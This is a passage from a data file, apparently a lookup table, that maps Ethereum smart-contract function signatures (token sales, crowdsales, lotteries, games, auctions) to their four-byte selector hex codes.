"0x33db82fd", "earlybird_percentage()": "0x7b68533f", "tokenMultisigWallet()": "0xd6a90bcf", "DOWN_etherWin()": "0x70646896", "whaleExchangeRate()": "0xe26534bf", "retirementManager()": "0x52ac882c", "minParticipants()": "0xa54cd4f7", "round1Sold()": "0x20392160", "project()": "0xf60ca60d", "deathData_v5()": "0x7fd8601e", "VECTORZILLA_RESERVE_VZT()": "0xcfe4fb8e", "erc820Registry()": "0x9f2a1471", "lastEvidence()": "0xc27d607b", "cHWCtoEth()": "0x1e62a511", "killBalance()": "0xdcafee05", "getMinimumFundingGoal()": "0x96d43cc6", "AIR_2_SUPPLY()": "0x5dee2492", "landsSold()": "0x5a012b17", "nextSeedHashed()": "0x0ac9bb29", "clearVolumeDiscounts()": "0xea4f0882", "firstRoundWMTokensLimit()": "0xa8a1d27b", "numHolders()": "0xcc642cc2", "treasuryTimelockAddress()": "0xc642b103", "weiCollected()": "0x39b8ce98", "tokensInvested()": "0x79c0d5ae", "medalDecimals()": "0x62bf6fa7", "priceTokenWei()": "0x0d229be7", "auditorComment()": "0xdd420fc5", "width()": "0x9ededf77", "isICOfinalized()": "0xe47ea649", "crowdsaleEndDeclarationTime()": "0x3985a4ab", "isOpenDistributionSetup()": "0xa0f1ba62", "myShareToken()": "0x0fd548ef", "holderAmount()": "0x98f9724f", "End2()": "0x0c90da51", "workerPoolHub()": "0x6e885bd7", "divholder()": "0xec847fe8", "bts_address1()": "0x8e1aa2c4", "previousDrawingClosed()": "0xb88746b0", "SponsorsQty()": "0x9fc6ceac", "crowdsaleDistributedUnits()": "0x7b370a01", "preSalePeriod()": "0x20689f29", "icoReceivedWei()": "0xe2c516be", "INVESTMENT_FUND_TOKENS_SUPPLY()": "0xe5c60d0b", "paidInstallments()": "0x44defdfd", "tokenPreSaleRate()": "0x2213c7db", "timelockEndTime()": "0xba78a98a", "mgmtDistribute()": "0x044a5f97", "purchaseTimestamp()": "0x25d3d0e3", "divMasterAmt()": "0xea3367ae", "maxTarget()": "0x099dde07", "dateTier2()": "0x61ef669b", "MAX_NUMBER_BETTERS()": "0xd63eea42", "bonusLimit1()": "0x1c68571d", "seedFund()": "0xd0b2b579", "burnUndistributed()": "0x26abfe09", "blocksPerHour()": "0xdbcd258d", "future_round_coins()": "0x1cf57f67", "_devteam()": "0xbbd5301a", "rowQuiter()": "0xfface4a3", "MINIMUM_PRESALE_PURCHASE_AMOUNT_IN_WEI()": "0x0aa0903c", "max_shares_to_sell()": "0x4d129486", "isPreICOPrivateClosed()": "0x28b94289", "tokenPerEth()": "0x0a084473", "all_unfreeze()": "0x281318c8", "private_setRandomAPIURL(string)": "0x7599f8d9", "private_delPermittedRoll(uint256)": "0x1990ad6b", "private_addPermittedRoll(uint256)": "0x7edea039", "player_getPendingTxByAddress(address,address)": "0x2d76be2d", "player_withdrawPendingTransactions()": "0x7955dd45", "constructAPIParam()": "0xc965e1d3", "getBetDivisor(uint256)": "0x7ddd0ce1", "rollDice(uint256,uint256)": "0x370e9161", "callback(bytes32,string)": "0x449ed7e0", "getBet(bytes32)": "0x37e8c09e", "getLiveMaxBet()": "0xa46f3c7a", "private_getGameState()": "0x3b1ecef0", "concatStrings(string,string)": "0x12600aa3", "bytes32string(bytes32)": "0x252fb38d", "callURL(string,string,string)": "0xfc2634b7", "initBridge()": "0x2447fe10", "currentLocation()": "0x6cd49925", "callURL(string,string,string,string)": "0xb476de2e", "getMinGas()": "0x4be860eb", "getMinReward(string)": "0x127ecfa9", "sellNow()": "0x3fc6a97a", "EthX()": "0xefa0e659", "feeWithdraw()": "0x6561e6ba", "awardByRndNo(uint256)": "0x80ec35ff", "withdrawByRndNo(uint256)": "0x528ce7de", "PRHXToken()": "0x7c7edd68", "Exilium()": "0x7386c2be", "getAuditors(uint256)": "0xd42dca55", "getStakedAudits(address)": "0x6455058e", "auditorCanWithdrawStake(uint256,address)": "0x55186c99", "auditorHasStaked(uint256,address)": "0x34d609ac", "withdrawStake(uint256)": "0x25d5971f", "slashStake(uint256,address)": "0xca315ca6", "rewardAuditor(uint256,address,uint256)": "0xc367ec17", "reviewAudit(uint256)": "0x00aea59b", "createAudit(uint256,uint256,uint256)": "0xe9445d5a", "allowAuditor(address)": "0x4bd3b4c6", "banAuditor(address)": "0x94c467d0", "addAuditor(address)": "0xe429cef1", "setMaxAuditDuration(uint256)": "0x4fae3254", "setStakePeriod(uint256)": "0x1e6b4c6f", "setOperater(address)": "0x634b4a8f", "changeAutherOwner(address)": "0x4e5acb1a", "sendBussinessByOwner(address,uint256)": "0x43cd5ea1", "sendMarketByOwner(address,uint256)": "0x0e32a720", "sendJigouByOwner(address,uint256)": "0xdfc75b9c", "sendCreatorByOwner(address,uint256)": "0xaa59770f", "sendICOByOwner(address,uint256)": "0xf93d029a", "sendMinerByOwner(address,uint256)": "0x2fa553d3", "miningEveryDay()": "0x81c7ae3b", "QueryUnlockTime(address)": "0x66b005ee", "TryUnLockBalance(address)": "0x0bac0312", "StopIco()": "0x17df1773", "StartIco()": "0x64d538d3", "safeToNextIdx()": "0x61798287", "WGNToken()": "0xa4c4dfea", "remainTime()": "0x4a7e130e", "retrieveEarnings()": "0x3020ea8a", "ReloadKeys(uint256,uint256)": "0x29d00d64", "BuyKeys(uint256)": "0x9e03c971", "ethForKey(uint256)": "0xf1f1e30f", "registerUserIfNeeded(uint256)": "0x2c3788b1", "calculateMasked(uint256,uint256)": "0x9bd80dcf", "updateWallet(uint256,uint256)": "0x013a9c50", "updatePlayer(uint256)": "0xa2be427d", "Price(uint256)": "0x63f32f63", "determineAffID(uint256,uint256)": "0xcd565bc5", "KanZhang()": "0xd1bc4157", "CHAD()": "0x4334a8a5", "unFrozen()": "0x47d137c5", "BitcoinMax()": "0x585b0f05", "switchToWhaleMode(bool)": "0x7f5a448c", "changeDoublr(address)": "0x68d967dd", "assignedDoublrContract()": "0x1ddf147f", "refundToken(bytes32,string,address,address)": "0x72eec3a7", "restoreOwner()": "0x0c832ef0", "getReduce(uint256,uint256)": "0x59627b84", "setThreshold(uint256,uint256,uint256)": "0x69ab0005", "biddingClosed()": "0x2da11b2e", "GBMToken()": "0xe74e6e9e", "removeBlockList(address)": "0x59b0d931", "addBlockList(address)": "0xf3ece9f4", "mint(bytes32,int256,address,uint256)": "0xc8ceaa95", "ClaimEth()": "0x22e02b22", "_D_sendToTeamEthContract()": "0xcacb27f4", "_C_sendToToteLiquidatorWallet()": "0x3a777ce0", "_B_sendToEthertoteDevelopmentWallet()": "0x4b4c2039", "_A_tokenSaleCompleted()": "0xfad7ed8c", "Controller(address,address,uint256)": "0x358ffd79", "WSTO()": "0xa78488e1", "get(address,address,string)": "0x7d4c1403", "put(address,string,string)": "0x6e8f7142", "addWhiteListMulti(address[])": "0x618de286", "ShieldNetwork()": "0x835eb9f8", "YUBToken()": "0xbca77cd6", "delayOpeningTime(uint256)": "0x7a38417b", "timeComplete()": "0x0335e18f", "maximumRaised()": "0xec3bb11a", "preValidatePurchase(address,uint256)": "0x9e68ca82", "resumeTokenSale()": "0x66875554", "transferAmount()": "0x504d27fd", "registration(string,string,string)": "0x0753afdf", "AT(uint256,string,uint8,string)": "0x7c434fbb", "setupRaffle(string)": "0x8bc19bda", "killSwitch()": "0xada14698", "setAttaccContract(address)": "0x2ff5e00c", "safetyModeOn()": "0x5d0e550a", "toggleSafetyMode()": "0x6587ab3d", "getRecords()": "0x8eff3c29", "CollabCoinToken()": "0xc161d506", "GallerionCoin()": "0xb22d9f50", "ThanosXToken()": "0xff176844", "TokenCoin4()": "0x7e29d2a3", "sendToken(address[],address[],uint256[])": "0xad509c1d", "sendEther(address[],uint256[])": "0xbcc91d61", "getTotal(uint256[])": "0x6fb438dc", "drawToken()": "0x0f9e42da", "getRandomInt(uint256)": "0xe0813e25", "getDrawCount(uint256)": "0x9e34d78e", "getCharacter(uint256)": "0xdabb0531", "setDappTokenContractAddr(address)": "0xebe6f3cc", "AirSwapToken(address,address,uint256)": "0x1ae6d375", "MhpCoin()": "0xdeb60627", "getFile(uint256)": "0x2bfda313", "addFile(uint256,string,uint256,string,string)": "0xc68581ea", "hello(string)": "0xa777d0dc", "getMemes()": "0x8c849f3f", "addMeme(string,string)": "0xe209bf22", "getBurningReward(uint256)": "0x75812019", "getMintingPrice(uint256)": "0xeb1635ed", "curveIntegral(uint256)": "0x3fd2300d", "mintFund(address,uint256)": "0xe25d4dac", "HitToken(string,string,uint8,uint256,address,address)": "0x358d1e26", "fundLockTransferFrom(address,address,uint256)": "0x481a4f2a", "fundLockTransfer(address,uint256)": "0x8b615813", "teamLockTransferFrom(address,address,uint256)": "0xd5da9e82", "teamLockTransfer(address,uint256)": "0x42f9b306", "fundLock(address,uint256)": "0xceca7e8e", "teamLock(address,uint256)": "0x04e6a9a1", "fundAvailable(address)": "0x4010a018", "teamAvailable(address)": "0x63a0557b", "rakeToken()": "0x308b7fea", "Signum(address,address)": "0x1c238e1f", "OneTestCoin()": "0xca4c8fc6", "Signum()": "0xa1d4c820", "show()": "0xcc80f6f3", "storeSomething()": "0x1188189e", "storeIt(string)": "0xf8e65295", "Preesh()": "0x82797bea", "biotorBiomassToken()": "0xbcd2feff", "setAicPrice(uint256)": "0x4266873f", "removeExemptionAddress(address)": "0xb5692a67", "addExemptionAddress(address)": "0xa6e315ff", "bulkTransfer(address[],address,uint256[])": "0x998bac16", "Gifto()": "0x80d07ce8", "buyGifto()": "0x430558c2", "createCitizen(address,uint16,uint16,uint8,bytes32,bytes32,bytes32)": "0x571b3d52", "_createCitizen(uint16,uint16,uint8,bytes32,bytes32,bytes32)": "0x65aec658", "createCitizen(uint16,uint16,uint8,bytes32,bytes32,bytes32)": "0x002a2133", "Crowdsale(address,address,address,uint256,uint256)": "0x80f5a37c", "Libertax()": "0x7cd87ee9", "award(address,address,string)": "0x8d622749", "rank()": "0x934209ce", "getTransactionIds(uint256)": "0xc95c0f7b", "createB()": "0xdbdc275d", "createA()": "0x55e46476", "oldWriteMessage(string)": "0x1d9680a7", "getGuestCount()": "0x97203543", "setGuestName(string)": "0x3660fcd0", "WelcomeMsg(string)": "0x2c98bf4a", "setlogaddr(address)": "0x637ea3e5", "txhash(string)": "0xb006e2b0", "getproductstatus()": "0x1e021b2b", "activateproduct(uint256)": "0xd4565916", "blockTransfers()": "0x7dcfd3d5", "Hawk2(uint256,string,string)": "0xb1d5114c", "validateReleasedToken(uint256)": "0xb5c7a4e4", "releasedTokenOf(address)": "0x4dfe28e7", "getFifthRoundReleaseTime()": "0x5469a173", "getForthRoundReleaseTime()": "0x292cdfa5", "getThirdRoundReleaseTime()": "0x3f430616", "getSecondRoundReleaseTime()": "0x35be7bf3", "getFirstRoundReleaseTime()": "0xd4620041", "getBeneficiaryFinance()": "0x06d0407e", "getBeneficiaryMarket()": "0x6c784995", "getBeneficiaryDevelop()": "0x81508615", "getBeneficiaryManage()": "0xf834db41", "Xin(uint256,string,string)": "0x8b4d3f20", "buyBNNTokens()": "0xffbd8c37", "BNNToken()": "0x6d0831f0", "EtherPredictx()": "0xb9f10278", "Etherplanet()": "0xd969b919", "StcToken()": "0x71b45696", "YiLiaoLian(uint256,string,string)": "0x7ab0089e", "changeForeignBridge(address)": "0x619c89fe", "Gnome()": "0x744013c4", "AthlierToken()": "0x6074123c", "LTS()": "0x49a634f0", "BifreeToken()": "0xbac0b029", "UXDToken()": "0x32b6f97a", "setOtherCurrenciesChecker(address)": "0x07a993e5", "startMigration()": "0x18264f33", "startRefunding()": "0x36ab753e", "resumeICO()": "0x9cbd7da5", "pauseICO()": "0x33c77a6d", "Goldmint(address,address,address,address,address,address)": "0x863d62ac", "FoundersVesting(address,address)": "0x56990301", "finishIco()": "0xec42f82f", "GoldmintUnsold(address,address)": "0x4ac1b5ff", "lockTransfer(bool)": "0x20b44b29", "MNTP()": "0x7fb5ff3e", "setIcoContractAddress(address)": "0x170381fe", "CosmicPowerToken()": "0x9e497967", "bytesToAddress(bytes)": "0x42526e4e", "mintAndTransfer(address,uint256)": "0x080571eb", "expandPeriod(uint8)": "0x1c3b3b9f", "calcBonusTokens(uint256)": "0x70320234", "takeEther(uint256)": "0x79c6c11a", "refuseWork()": "0x9db02721", "takeUpWork()": "0x929d2033", "NooCrowdsale()": "0xcfca375c", "allocateLocked(address,uint256)": "0xc1614981", "allocateLiquid(address,uint256)": "0x32e7f81f", "initialiseAllocations()": "0xf48be22b", "buyinReturn(address)": "0x61e49344", "processPurchase(address)": "0xab45e2a0", "purchaseTo(address)": "0xd1577656", "specialPurchase()": "0xe2f60706", "notePrepurchase(address,uint256,uint256)": "0x572f37b4", "AmbrosusSale()": "0x6199ca26", "unlockTokens(address)": "0xcb67f948", "currentPhase()": "0x055ad42e", "mintLocked(address,uint256)": "0x5143e246", "AmberToken()": "0xc62122eb", "distributeAirdrop(address[],uint256[])": "0xdd924594", "lockupAccounts(address[],uint256[])": "0x64ddc605", "enableWhitelist()": "0xcdfb2b4e", "_preApprove(address)": "0x518d6c2d", "getBFEX(address)": "0x643537aa", "checkContribution(address)": "0xab0ced0e", "checkBenefit(address)": "0x26c2bcb4", "isWhitelist(address)": "0xc683630d", "removeFromWhiteList(address)": "0x01bf6648", "setMaxContributor(uint256)": "0xfcc29ae8", "_transferOwnership(address)": "0xd29d44ee", "MaxPowerCoin()": "0xff9e7fe1", "AVGONE()": "0xf51dcaa7", "mintMore(address)": "0x1cb07902", "Lambo()": "0x9e159db0", "gibLambos(uint256)": "0xc4fbdaff", "playerTakeOff(uint256)": "0x2968e640", "setPlayerPrice(uint256,uint256)": "0xc4f62031", "sendPlayerBack(uint256[])": "0x9cf488ad", "getPlayerDefend(uint256)": "0x1cabc785", "playerAttack(uint256,uint256)": "0xcbaa0b25", "drawPlayer(address,address)": "0xbdd2d286", "createPlayer(uint16)": "0x266ce248", "changeInviteRate(uint256)": "0xab60443b", "changeCoolDownTime(uint256)": "0xaca7207a", "changeDefendFee(uint256)": "0x6d0f2a84", "changeDrawFee(uint256)": "0x84248a51", "CentrallyIssuedToken()": "0x8690d6d5", "frozen(address)": "0xd0516650", "emergencyStop(bool)": "0x0ac62e02", "doThrow(string)": "0xe89c9b5d", "AtomCoin()": "0xc0946d54", "SentTo(address,address)": "0xbe80073a", "assignBounty(address,uint256)": "0x5a6b3a79", "assignBountryToReferals(address,uint256)": "0x5be54515", "referral(address)": "0x7247959a", "issueTo(address,uint256)": "0x1207f0c1", "setGrowth(uint32)": "0xb8c577ff", "Fish()": "0xd89fda34", "get_tokens_count(uint256)": "0x40f9cdf9", "buyRBCTokens()": "0x4e23176c", "transferPayable(uint256)": "0x6b97be1f", "setBeneficiaryAddress(address)": "0xec6be06e", "stopTransfers()": "0x7adac0e6", "RebateCoin()": "0xc1ab1b54", "viewMessage()": "0x191384d1", "messageBoard(string)": "0xf2e22ae0", "DevGiveBlockReward()": "0xc12d97de", "DevChangeMiningReward(uint256)": "0x3f7b54f9", "SafeMath()": "0x3acab680", "BCT()": "0x3b704588", "requestUpdate(uint256)": "0xc14c1ce3", "changeSender(address)": "0xb280a7e7", "deleteToken(uint256)": "0x6297c16c", "update(uint256,string,uint256,uint256,uint256,uint256)": "0x1833fa4c", "updatedAt(uint256)": "0xc818faec", "GBP(uint256)": "0x5a8ef28a", "EUR(uint256)": "0xd67ae54d", "USD(uint256)": "0x0c560c64", "ETH(uint256)": "0x67f01c04", "FiatContract()": "0x0b4650a0", "VantageCrowdsale(uint256,uint256,uint256,uint256,uint256,address)": "0x531ca478", "getVaultAddress()": "0x65cacaa4", "updateGoalCheck()": "0x1df025d6", "VantageToken()": "0x70d54287", "publicSaleTransfer(address[],uint256[])": "0x95bb8d46", "lawSupportProfitAddress()": "0xcc6e8593", "WALLET_ADVISOR()": "0x9d7437b8", "BASIC_RATE()": "0xa2be23cd", "dividendRecentBuyersPercentage()": "0x82d708c4", "mulbonus()": "0x1b61a179", "totalReservedTokenAllocation()": "0x230b1eb5", "jack_max()": "0x4e16bef5", "winAmount1()": "0xaecbb5f1", "minBalanceToAllowContractCreation()": "0x6e8c57e6", "TRM1BonusActive()": "0xa904e5c8", "winning_ticket()": "0x3c5f10a3", "contract2Address()": "0x90f08b32", "privateSaleBonus()": "0x89a5f2df", "pricePerUnit()": "0xe66825c3", "Msg()": "0x7ac7ef85", "queryRandomTryTime_()": "0x7ffc80cf", "price_token()": "0x984474fb", "richestRoundId()": "0x72e3f040", "COMMISSION_PERCENT()": "0xb404e001", "InvEnterpriseAddr()": "0xc67117f5", "allocated12Months()": "0x9434d765", "niceGuy()": "0xe8c6ed14", "tokenEventAddress()": "0xa5d3845b", "operationAddress()": "0xa441c302", "isDaySixtyChecked()": "0xe0e32504", "lockMax()": "0x0ac153ac", "CROWD_WEEK1_PERIOD()": "0x870bb8c2", "shareLimit()": "0x3be75aa3", "ROLE_ORACLE()": "0xf0173703", "pre_end()": "0x9a713233", "presaleWhitelistTokensLimit()": "0x592efdab", "freezeOracle()": "0xaf91e0bf", "recharge()": "0x4cddae28", "ENJ_UNIT()": "0xb1f9275f", "player2Timestamp()": "0x310883a8", "institutionTimeLock()": "0xdd294142", "xmr()": "0xd60df5be", "priceRound2()": "0x55036214", "TOTAL_TOKENS_FOR_CROWDSALE()": "0x96bf4ed5", "tip_total()": "0xfc26d522", "src()": "0x2e7dc6af", "allPlayCount()": "0xd8632388", "isMessageEnabled()": "0xfbf2360c", "minContributionETH()": "0xf5663819", "coinageContract()": "0x8b169c7a", "limitEther()": "0x202a46cf", "currentRoundCount()": "0xaaffc4b6", "stoppedSale()": "0xf0af50c9", "datacoin()": "0x79c88f20", "getTokensInAction()": "0x82396f60", "_foundationSupply()": "0x5a0f3c40", "nextroundERCtradeactive()": "0xffcc8484", "flushHouseFees()": "0xca2785bf", "rateFinalStage2()": "0xdaeed3a6", "mintAsideTokens()": "0x197ea97e", "iOwner()": "0x77c9dd4b", "quarterFirst()": "0xf8548bea", "BFTcoin()": "0xf5336737", "ROLE_MINTER()": "0x92afc33a", "startTimeDay()": "0xed93ca26", "domainPrice()": "0x5c97404a", "walletsDelegate()": "0xfa34b345", "tgeDuration()": "0x6fa58335", "tokensIssuedForBonusRangeTwo()": "0x2a272974", "rateStage2()": "0xd6be178d", "totalRepaidQuantity()": "0x0b901c82", "isSwapDone()": "0xa28504b4", "totalHatcheryShrimp()": "0x6bc46fb2", "nextGameInitialMinBetSize()": "0x2c0aadc1", "XTVNetworkContractAddress()": "0xdbc02821", "tokenPriceOracle()": "0x2ac50df1", "partnersAllocation()": "0xbae5e693", "addEthForSell()": "0x67dfe2d3", "contRefer50x50()": "0x98d70779", "DAYSECONDS()": "0x292cbbba", "backendOperator()": "0xc7b6084c", "whitelistWeiRaised()": "0xa1885d9b", "BET_RELEASE_DATE()": "0x9b1f70d1", "whackingPool()": "0xd06b3ea0", "limitSupplyPerYear()": "0x55dfc97c", "week_max()": "0x18b4a924", "ethCrowdsale()": "0x5862fd31", "initialIssuance()": "0xfc22a9f8", "currentSnapshotId()": "0x970875ce", "commissionPercentForCreator()": "0x39431308", "p1_start()": "0x45656757", "contractEnabled()": "0x41b3a0d9", "safeBlock()": "0xb4c48026", "gameOpened()": "0x8143eb2d", "PRICE_STAGE_THREE()": "0xe02f8d33", "totalDistributedAirdrop()": "0xe09413ba", "minThresholdUnits()": "0x762549e0", "REFERRAL_BONUS_LEVEL2()": "0x06f1117d", "preIcoEnded()": "0x1813b684", "transferGainedEther()": "0xd43948ee", "SQR_TOKEN_MULTIPLIER()": "0xfb80d66f", "totalFiatValue()": "0x13e50ca4", "_myDecimal()": "0x65ce47fb", "initiationTime()": "0x17c70de4", "tokensVotedForDisable()": "0x98668b24", "tokensRaisedRound()": "0xe5f5d05b", "vrc()": "0xb01454dd", "DISCOUNT_TOKEN_AMOUNT_T1()": "0x5b6edf78", "expired()": "0x4c2067c7", "dateIT()": "0xd61fb0bf", "ART_DECIMALS()": "0xf1ace1a1", "numberOfStarsToReserve()": "0xb4980148", "thirdCheckpoint()": "0xb24ce5fa", "COMMUNITY_BOUNTY_HOLDER()": "0xdd86f719", "stageOneClosed()": "0xa3246549", "makeLiquidPri()": "0x28006b31", "shareHoldersWallet()": "0xf2760d9c", "maxMintQuantity()": "0xae9aea6d", "vernamToken()": "0xa96088a5", "teamTokenAddress()": "0x5d3a5e3b", "UNSOLD_ADDRESS()": "0xe0623632", "exchangeStart()": "0xdf36318a", "totalGooProduction()": "0x7ef58e73", "MAX_ALLOWED_BY_STAGE_1()": "0x1fabb318", "airdropSupply()": "0xfb3ed5c7", "airdroptoken()": "0xb96890a1", "devTokensIco3()": "0x581d1d04", "CLAWBACK_PERIOD()": "0x021ba8f8", "mmLib()": "0x63ddc54d", "rwGas()": "0x5876d2ef", "endPostICO()": "0x7fc3bb26", "totalWeiAmountSale2()": "0xbb1eeb59", "crowdsaleRefund()": "0x4ba5b7b3", "MIN_SALE_AMOUNT()": "0x53448316", "POLY()": "0xe4bbb4b0", "dividendsCalculated()": "0x83f2a8ca", "marketingAddress()": "0xa5ece941", "LIMIT_TRANSFERS_PERIOD()": "0x67f04688", "ratePublicSaleStage()": "0xb604a86e", "SALE_START_TIME()": "0x44dbb571", "REFERRAL_BONUS_LEVEL5()": "0x7d8fe090", "jackpotDifficulty()": "0x5cc5c5cf", "PRE_ICO_TILL()": "0x7628e728", "m_lastFundsAmount()": "0x63304bc3", "_selling()": "0xf9323a32", "tier_rate_2()": "0x9303633e", "excavation()": "0x4710c63c", "MAX_NUM_AVAIL()": "0x43216a11", "USD_HARD_CAP()": "0xfea1377d", "distributeBalanceToInvestors()": "0xfd5c0663", "crowdfundPercentOfTotal()": "0x1afaa8bf", "MoneyCoinCoin()": "0x80b52136", "vaultClosed()": "0x5c9920fc", "nAddresses()": "0xabea0804", "crowdsaleTokenMint()": "0xe808d671", "getBankAccount()": "0x19e4540b", "isNewWeek()": "0x0dbf2a3f", "aDropedThisWeek()": "0xa14fc1e7", "ICO_END_DATE()": "0xda0ef68b", "TICKET_PRICE()": "0x1a95f15f", "teamAllocator()": "0x52fea23c", "_crownTotalSupply()": "0x56e8f53e", "shareTimeGap()": "0x52476ceb", "PRESALE_LEVEL_5()": "0x45078531", "cause()": "0x878c1484", "allocationAddress()": "0xdbd6f5c1", "bufferWallet()": "0xca29cae8", "IND()": "0x14eea0dc", "perTokenPrice()": "0xba391bb2", "lastBlock_a6()": "0x491c8e08", "auxWorstPoints()": "0x84682fbb", "RAFEND()": "0xd75b5d9d", "EMISSION_FOR_SALESTAGE4()": "0xde530bbb", "todaysBidTotal()": "0x15899670", "stalePeriod()": "0xa5b36a36", "cPT()": "0xd53aaec2", "producedCaps()": "0x07336e35", "bursarAddress()": "0x51ebe2f1", "contractEth()": "0x588b1578", "minRequired()": "0x13e26d58", "founderTokenWithdrawnPhase3()": "0x6453558e", "ICO_TIER_FIRST()": "0xb517570a", "getAllAddress()": "0x715b208b", "LOCKED_BOARD_BONUS_TOKENS()": "0x75749f52", "alsToken()": "0x42ef8c76", "foundationReserve()": "0x603066a4", "distributionPreIcoCount()": "0xa150be7a", "monthlySubscriptionCost()": "0x06184a25", "phasePublicSale3_From()": "0xa7b2042f", "PARTNERS()": "0x94b91f06", "ICO_GOAL()": "0x6a5690f6", "walletTwitter()": "0x60c2db45", "powerDayRate()": "0xea58c955", "isGuessesOpen()": "0xd5aa7803", "helpCoinAddress()": "0x1d5407aa", "plantedTime()": "0x27dd3873", "gemHpConversion()": "0x9cd0126a", "buyTransferFee()": "0xe769dfbd", "minimumTarget()": "0x42235da6", "BEY()": "0x89e96773", "ensNode()": "0xddbcf3a1", "holderReward()": "0xa2558ee2", "totalUsed()": "0xb2e2c75f", "firstRoundTime()": "0x8a2e467c", "isIcoSuccessful()": "0x7f28c44f", "Update(uint256,uint256,string)": "0x2e323f5d", "ReplyShare(uint256,string,bool,string)": "0x7e56d25f", "NewShare(string,bool,string)": "0xc2ff0f15", "EtherShare()": "0x32ba36d6", "setBidding(uint40,uint256)": "0x7c0ab7be", "getBiddingInfo(address)": "0xdcb9528e", "createShapeShiftConversionPost(string,string)": "0xeb4c5ab9", "concatBytes(bytes,bytes,bytes,bytes,bytes,bytes,bytes)": "0xdc29a89e", "isValidString(string,string,uint256)": "0xd8879dd8", "engine(string,string,address)": "0xefa40c2a", "getInterCryptoPrice()": "0xab7a162f", "recover()": "0xce746024", "cancelConversion(uint256)": "0x94b9f152", "convert2(string,string,address)": "0x0d011088", "convert1(string,string)": "0x38c8ec85", "InterCrypto()": "0xb987bdac", "update_oraclize()": "0x4123057e", "myUsingOraclize()": "0x51a0c395", "isNullAddress(address)": "0x9798a106", "isApproved(address,uint256)": "0x2a16cca4", "setPriceIncreaseScale(uint256)": "0xaad99ef1", "setGrowthBump(uint256)": "0x0d963235", "setMinStartingPrice(uint256)": "0x6fba7544", "getCeleb(uint256)": "0x1d7bc449", "updateTraits(uint256)": "0x25b3edd9", "setKpopArenaContractAddress(address,address)": "0x161c8594", "setCoAuthor(address)": "0x43d1498b", "updateCeleb(uint256,uint256[6],uint256[6])": "0x96cc7be7", "createCeleb(string,uint256,uint256[6],uint256[6])": "0x39fc978d", "KpopCeleb()": "0xee8327fd", "JCCoin()": "0x7c74d4d4", "testhash(uint256,uint256)": "0x2beea5c5", "UnilotBonusTailToken(address)": "0x223c5939", "GasFiles()": "0xecb15644", "WAMToken()": "0x1ee1665d", "VEC()": "0xb0ca2e62", "Aereum(uint256,string,string)": "0xee112b59", "FCChainTokenTest(uint256,string,string)": "0xa5a0545f", "setNumRewardsUsedForAddress(uint256,address,address)": "0xc30715d1", "tmed()": "0x17d3953f", "cancelTrade(address)": "0xdd8ef66b", "completeTrade(address)": "0x755bdcc1", "finalizeTrade(address,uint256,address,uint256,uint256)": "0x626fc458", "startTrade(address,address,uint256,uint256,uint256)": "0xd54656d5", "CbDataStandardToken(uint256,string,uint8,string)": "0xe6838ffa", "NigerTokenICO()": "0xa44da065", "NetworkSocietyToken()": "0x5990e665", "Bugis_Crowdsale()": "0x37ff65da", "bid(address,uint256,uint256)": "0x0f41ba4b", "SaleClockAuction(address,address,uint256)": "0xfbd0c5d7", "ClockAuction(address,address,uint256)": "0xf2590315", "_bid(address,uint256,uint256)": "0x35f2fbaf", "MNLTOKEN()": "0x384e2bf5", "CVR()": "0xb7160dee", "PRIME()": "0x0017cd8b", "getCurrentDiscount()": "0xf0eb737a", "DiscountedPreICO(uint256,uint256)": "0x9cd04996", "QuintessenceToken()": "0x3578abf4", "AbstractQuintessenceToken(uint256,uint256)": "0xef6a88de", "ownerWithdrawal(uint256,address)": "0xba3fc155", "deposit(uint256,uint256,uint256)": "0x00aeef8a", "BuyBackStart(uint256,uint256,uint256)": "0xcb92cb52", "checkActualPrice()": "0x2dea82b4", "GAP()": "0xb2ca38fe", "CloseCrowdSale(uint256)": "0xeec3fcff", "manualBuyPrice(uint256)": "0x84249ed0", "tokensAmount()": "0x663a0ebb", "safeCheck(uint256)": "0xc719348b", "levelChanger()": "0x6bfbf5e6", "wdivide(uint256,uint256)": "0xf752fdc3", "wmultiply(uint256,uint256)": "0x3c8bb3e6", "wminus(uint256,uint256)": "0xf0920a41", "wplus(uint256,uint256)": "0xc6b3a7cf", "hdivide(uint256,uint256)": "0xffe4914a", "hmultiply(uint256,uint256)": "0x0815711a", "hminus(uint256,uint256)": "0x3beb0044", "hplus(uint256,uint256)": "0x56782e5b", "getFeeRecipientById(uint256)": "0xfc10d4d5", "Free()": "0xff85bd39", "numberOfDAppNodePackages()": "0xaa6ebdcb", "getPackage(uint256)": "0xb99dfe18", "updatePackage(uint256,string)": "0xa979169f", "addPackage(string)": "0x0ace8c9a", "DAppNodePackageDirectory(address,address)": "0x78719ee8", "blacklistEscapeToken(address)": "0x1b848606", "getBonus(uint256,uint256)": "0x9427aa96", "addUnsoldAllocationOrder(bytes32)": "0x13f29768", "setRateForOrder(bytes32,uint256)": "0x4cc22528", "getOrder(bytes32)": "0x5778472a", "addOrder(bytes32,address,uint256,uint256)": "0x7f85c599", "getPreICOFundersCount()": "0xfc22545c", "getFundersCount()": "0x920b3a7e", "isFunder(address)": "0x1ea48870", "addFunder(address)": "0x1bbe9d8c", "BetexStorage()": "0x322370ff", "RealtyCashToken()": "0x6fe69dee", "transferToAddress(address,address,uint256,bytes)": "0x30cd90b8", "subFromAddressBalancesInfo(address,uint256)": "0x0247e02a", "addToAddressBalancesInfo(address,uint256)": "0x5241590d", "updateRoundInformation()": "0x4268a257", "Xian()": "0x8cc7ea0e", "shouldGetHighFive()": "0x817d62a4", "SMILE()": "0x5405e4f4", "createOfAthleteCard(string)": "0x2814a371", "EOS_Silver()": "0xde874962", "RootNo3(uint256,string,uint8,string)": "0x3d6eec6b", "getMyWallet(address)": "0x31d29af1", "getWalletList()": "0xfc9ffe02", "YunnimToken()": "0xcdcc599b", "love()": "0xdff53231", "freecommunitycoin()": "0xc2674780", "GeezerToken()": "0xe3f4ffdc", "SingularityTest3()": "0xc3ca3c6a", "ChenToken()": "0x2e597ada", "getFundsStatus()": "0x156f985c", "feeBeneficiary()": "0x492fb343", "feePpm()": "0xa534150c", "depositPpm()": "0x8259c78c", "guest()": "0x9a04f704", "host()": "0xf437bc59", "dateTo()": "0x243d230c", "dateFrom()": "0x0b98107c", "bookingId()": "0x0a10df7c", "listingId()": "0x9405dfdd", "roll(bytes)": "0xf04646fe", "roll_normal(address,uint256,uint256,bytes32,bytes32,bytes,bytes32,uint256)": "0xfafb9334", "_roll(address,uint256,uint256,bytes32,bytes32,bytes,bytes32,uint256)": "0xcc466256", "externalCheckSign(bytes32,bytes,address)": "0xfdd1a4e9", "internalDoRoll(bytes32,bytes32,uint256,uint256,uint256)": "0x3f444db1", 